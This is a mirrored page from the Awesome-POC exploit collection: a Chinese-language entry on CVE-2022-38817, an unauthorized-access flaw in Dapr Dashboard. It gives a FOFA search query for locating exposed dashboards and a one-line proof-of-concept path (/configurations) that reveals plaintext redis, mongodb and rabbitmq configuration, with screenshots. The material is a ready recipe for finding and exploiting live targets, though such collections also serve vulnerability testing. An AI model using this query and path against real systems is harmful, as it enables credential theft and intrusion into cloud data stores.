admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Dapr Dashboard configurations 未授权访问漏洞 CVE-2022-38817.md
Threekiii 8971edcc6d 更新漏洞库:Web应用漏洞/
2022-10-17 17:17:13 +08:00

33 lines
767 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Dapr Dashboard configurations 未授权访问漏洞 CVE-2022-38817
## 漏洞描述
Dapr Dashboard 存在 未授权访问漏洞在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息并可以进一步利用这些配置信息获取云上的敏感数据
## 漏洞影响
```
Dapr Dashboard
```
## FOFA
```
"Dapr Dashboard"
```
## 漏洞复现
主页面
![image-20221017171042042](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210171710081.png)
验证POC
```
/configurations
```
![image-20221017171055193](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210171710235.png)
![image-20221017171111046](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210171711095.png)
Reference in New Issue View Git Blame Copy Permalink